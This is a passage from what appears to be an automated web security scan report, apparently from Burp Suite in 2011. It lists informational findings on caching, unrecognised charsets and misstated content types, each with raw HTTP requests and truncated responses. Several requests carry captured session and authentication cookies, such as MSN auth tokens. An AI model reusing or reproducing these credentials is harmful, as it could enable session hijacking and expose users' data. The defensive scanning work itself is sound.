Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:16:11 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 17821

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
31.65. http://www.nutter.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /home.php

Request

GET /home.php HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:14:45 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 16557


<!-- home start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
31.66. http://www.skichalets.co.uk/top/Crossfader.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skichalets.co.uk
Path:   /top/Crossfader.js

Request

GET /top/Crossfader.js HTTP/1.1
Host: www.skichalets.co.uk
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:32:55 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2034

/**
* author:        Timothy Groves - http://www.brandspankingnew.net
*    version:    1.3 - 2006-11-02
*/
var useBSNns;

if (useBSNns)
{
   if (typeof(bsn) == "undefined")
       bsn = {}
   var _bsn = bsn;
}
else
{

...[SNIP]...
31.67. http://www.socialfollow.com/button/image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/image/

Request

GET /button/image/?b HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:18 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />
<b
...[SNIP]...
31.68. http://www.socialfollow.com/js/flash-detect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /js/flash-detect.js

Request

GET /js/flash-detect.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 6402
Content-Type: text/html


if(typeof deconcept=="undefined")var deconcept=new Object();if(typeof deconcept.util=="undefined")deconcept.util=new Object();if(typeof deconcept.SWFObjectUtil=="undefined")deconcept.SWFObjectUtil=ne
...[SNIP]...
31.69. http://www.socialfollow.com/js/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /js/jquery.js

Request

GET /js/jquery.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/html
Content-Length: 56805


(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||
...[SNIP]...
31.70. http://www.socialfollow.com/js/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /js/thickbox.js

Request

GET /js/thickbox.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/html
Content-Length: 8343


var tb_pathToImage="images/loadingAnimation.gif";$(document).ready(function(){tb_init('a.thickbox, area.thickbox, input.thickbox');imgLoader=new Image();imgLoader.src=tb_pathToImage;});function tb_in
...[SNIP]...
31.71. http://www.socialfollow.com/js/validator.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /js/validator.js

Request

GET /js/validator.js HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/html
Content-Length: 9358


function in_array(needle,haystack,argStrict){var found=false,key,strict=!!argStrict;for(key in haystack){if((strict&&haystack[key]===needle)||(!strict&&haystack[key]==needle)){found=true;break;}}
ret
...[SNIP]...
31.72. https://www.taxnotebook.com/CopyRightTN.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /CopyRightTN.htm

Request

GET /CopyRightTN.htm HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
Referer: https://www.taxnotebook.com/Login/ChangePwd.aspx?AccNo=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionStateGUID=d3f0c14d-633a-5811-67ba-46ed879ceb86

Response

HTTP/1.1 200 OK
Content-Length: 632
Content-Type: text/html
Last-Modified: Mon, 11 Oct 2010 16:26:04 GMT
Accept-Ranges: bytes
ETag: "036d3ff6069cb1:252"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:50:51 GMT

<html>
<head>
<title>Tax Notebook Copyright</title>
</head>
<body>
<table height="120" width="100%" border="0" cellspacing="5">
<tr><td colspan="2" align=center><font face="Arial, Helvetica, san
...[SNIP]...
32. HTML uses unrecognised charset  previous  next
There are 2 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

32.1. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card.asp?time1=1304753251678&time2=1304754493643&prev=http%3A%2F%2Fburp%2Fshow%2F19&referer=http%3A%2F%2Fwww%2Eexpedia%2Ecom%2FHTX%5FFLTFLEX%5FCALENDAR%2Ehtml&height=1200&width=1920&custom_var=80312807C795402E93C5016D2A2A3E1B| HTTP/1.1
Host: secure.opinionlab.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 02:48:21 GMT
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDQCRBQCAC=NDNBDONBCBPKEFFJPEOEPEHB; path=/
Vary: Accept-Encoding
Content-Length: 8271

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
32.2. http://www.advisorsquare.com/new/asle05/content.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.advisorsquare.com
Path:   /new/asle05/content.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /new/asle05/content.asp?contentid=2016654382 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7824
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=BAHHGKOBKBCFJNFLLADEPNPM; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:06 GMT

<HTML>
<HEAD>
<LINK href="/new/asle05/content.asp?contentid=2016654382" rel="stylesheet" type="text/css">
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-0">
</HEAD>

<BODY>
...[SNIP]...
33. Content type incorrectly stated  previous  next
There are 94 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

33.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSHP&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; FC05=FB=AgEAtw4P67gB; FC01=FB=AgEAuQ5ZB8gB; FC06=FB=AgEAvQ6Q8uwB; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC08=FB=AgEAvw4O/vgB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MSNRPSAuth=FAASARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACBXYMoVREhyX0ADLEJLRiPILXfTnhyCvz9Go%2BL7ambo5dBf6RPTXNt11NoFy1AJuaoT0T2TxOAfGJcKG/wWHoMkWH3wqP/QN4jo1m7%2BNAdM3RHhQe8kiYltNKWPKkGejQZdl3uqmHRAAJQRYkMgp%2Bk0igKH1uU7%2BaR1w286L%2BYfi4CaaklOll/V2B7ivbPIflLPVJp/6vrubl9M4NrNx0QrX2G/gGs2ld4fHZkFuMyfd4%2BjMWtYCICZPYlmSFBwzjujFs8NWYS3WQmeL0gTh5CIQsx9kx17vsdPAFADz38T8NSgH2c2NxW8mM2p59qrjpw%3D%3D; MSNRPSShare=1; MSPAuth=9ZS6z9CnTHW6nQVLn69F5g6Kq1ZGc3ZrwOlg*roxIBmxDiYnXGxD!lZbQ3NaDTBICmclo916XIZmzbCt239s9!ofrljHmXARncTrTBhSXE5HYpO4CvzewYRcgboqrT6F63; MSPProf=9ng3Qj0dWDBgjckYbAydF4TeuPZIEqjRUAIQsjQC8bD7wSE7YcBkffxuAYa*5hFyfmsZw0z5iSAqmoJrRbBKbwEfaqa8N2YTDV8M*Hh!5oVibmYhBosajfilIcF947gI11Ahkt99*Z2rSzijfj!a0ur7*saIB9TO0cdTX34uzM5!JKmnlQDSL8Hw$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=TyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ&W=1; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 3059
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8422179-T10903891-C48000000000042298
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:06 GMT
Content-Length: 3059


//<![CDATA[
function getRADIds() { return{"adid":"48000000000042298","pid":"8422179","targetid":"10903891"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
33.2. http://a1.twimg.com/profile_images/258292367/av-2_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.twimg.com
Path:   /profile_images/258292367/av-2_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/258292367/av-2_normal.gif HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:22:17 GMT
Expires: Mon, 06 May 2019 12:28:53 GMT
Last-Modified: Thu, 11 Jun 2009 06:07:05 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "4996246bea2a80e42e3f62eff22bf19e"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 1c2f2427f69a0b13d01c4befcf21a21e2eb99f8fbbc7bd615fb1961272354d3400bf406cfe30b80c,cd2271c1a243f46b9a749a0149265562c50653586478cbd2022e79cb314321f0ded8f86937266415
x-amz-id-2: E2pEs/fGfMQBfASDmBfFUcFHm8olLUDDdEmotZXnXOr5ReCma7nRFNdkPsCA1heY
x-amz-request-id: D6D8E328ED3305D3
X-Cache: Hit from cloudfront
Content-Length: 2998

.PNG
.
...IHDR...0...0.....W.......bKGD.............    pHYs...H...H.F.k>...    vpAg...1...0..._....AIDATh...{pSu..?....m.}.b).R..-..i.-(X`.V.ZVq..XDd.Ea..EpYT......
>..Yj...yV.....$$.E.$}.L....?ns.K.....
...[SNIP]...
33.3. http://a2.twimg.com/profile_images/58727890/PIA08370_normal.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a2.twimg.com
Path:   /profile_images/58727890/PIA08370_normal.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /profile_images/58727890/PIA08370_normal.png HTTP/1.1
Host: a2.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:58 GMT
Expires: Mon, 15 Apr 2019 04:09:23 GMT
Last-Modified: Fri, 22 Aug 2008 17:38:54 GMT
Cache-Control: max-age=252460800
Content-Type: image/png
ETag: "1cbb8858793bc2c96937575a188fe016"
Server: AmazonS3
X-Amz-Cf-Id: 287fbafefab4c7869cd83c63b0550cc46aaed82e4a7b056161ff7336bd6a90127b6e0acee4c03c85,7c4511716843f957059e75e2b73f6c4c155152816f51b2add69370a2f43962dd4c68e2a5babae7e9
x-amz-id-2: 1ufYE5LP5vjyI4K5rYVRef+n30CJT8JUWmiD0jOXOkbS6o4wa4hj796SPWtwks8D
x-amz-request-id: C4CF97FCBFDF2ED2
X-Cache: Miss from cloudfront
Content-Length: 795

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......0.0.."..............................
...[SNIP]...
33.4. http://a3.twimg.com/profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a3.twimg.com
Path:   /profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:55 GMT
Expires: Sun, 05 May 2019 15:34:58 GMT
Last-Modified: Thu, 25 Jun 2009 22:56:07 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "54b6a390feaefbcacf6b86203afa2b54"
Server: AmazonS3
X-Amz-Cf-Id: 132c008139c2a0d3c7d42e66b08c2217ab66952abc9e16a1c67fe5ec02af49a4176e74b315d706b9,e69226e20f3edb254f60c85f5a506926b4f8ad8a0bbc28d3cff961a94e4458e2f32ff5e2bc4f8e98
x-amz-id-2: yxQvCihey4HoJR3zTnbN5BIO0OjFpVFiysjK+Gn24aotSL5NXHzHNBm/etgJCB4G
x-amz-request-id: 6CDA7079649212E9
X-Cache: Miss from cloudfront
Content-Length: 6360

.PNG
.
...IHDR...0...0.....W.......bKGD.............    pHYs...H...H.F.k>...    vpAg...0...0....W...cIDATh...w|\.....L....4............6..0.d).$...K6..IH.l.7.Y..........ll...+.d...Gm$.4ESn.?..$.....o>w..
...[SNIP]...
33.5. http://allatsea.net/assets/social/find_us_on_facebook.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://allatsea.net
Path:   /assets/social/find_us_on_facebook.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /assets/social/find_us_on_facebook.png HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:06:42 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Sun, 14 Mar 2010 04:34:56 GMT
ETag: "95f0d56-5a7-4954bc00"
Accept-Ranges: bytes
Content-Length: 1447
Connection: close
Content-Type: image/png

GIF89a..,.......m.....Fb.Ql..........ay.]u.~...........s........l..............Wq.............Gc.`x.x..h~................;Y.............................................................................
...[SNIP]...
33.6. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN3&AP=1090 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; FC05=FB=AgEAtw4P67gB; FC01=FB=AgEAuQ5ZB8gB; FC06=FB=AgEAvQ6Q8uwB; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC08=FB=AgEAvw4O/vgB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MSNRPSAuth=FAASARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACBXYMoVREhyX0ADLEJLRiPILXfTnhyCvz9Go%2BL7ambo5dBf6RPTXNt11NoFy1AJuaoT0T2TxOAfGJcKG/wWHoMkWH3wqP/QN4jo1m7%2BNAdM3RHhQe8kiYltNKWPKkGejQZdl3uqmHRAAJQRYkMgp%2Bk0igKH1uU7%2BaR1w286L%2BYfi4CaaklOll/V2B7ivbPIflLPVJp/6vrubl9M4NrNx0QrX2G/gGs2ld4fHZkFuMyfd4%2BjMWtYCICZPYlmSFBwzjujFs8NWYS3WQmeL0gTh5CIQsx9kx17vsdPAFADz38T8NSgH2c2NxW8mM2p59qrjpw%3D%3D; MSNRPSShare=1; MSPAuth=9ZS6z9CnTHW6nQVLn69F5g6Kq1ZGc3ZrwOlg*roxIBmxDiYnXGxD!lZbQ3NaDTBICmclo916XIZmzbCt239s9!ofrljHmXARncTrTBhSXE5HYpO4CvzewYRcgboqrT6F63; MSPProf=9ng3Qj0dWDBgjckYbAydF4TeuPZIEqjRUAIQsjQC8bD7wSE7YcBkffxuAYa*5hFyfmsZw0z5iSAqmoJrRbBKbwEfaqa8N2YTDV8M*Hh!5oVibmYhBosajfilIcF947gI11Ahkt99*Z2rSzijfj!a0ur7*saIB9TO0cdTX34uzM5!JKmnlQDSL8Hw$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=TyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ&W=1; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2406
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7932771-T37389090-C65000000000015128
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:06 GMT
Content-Length: 2406


//<![CDATA[
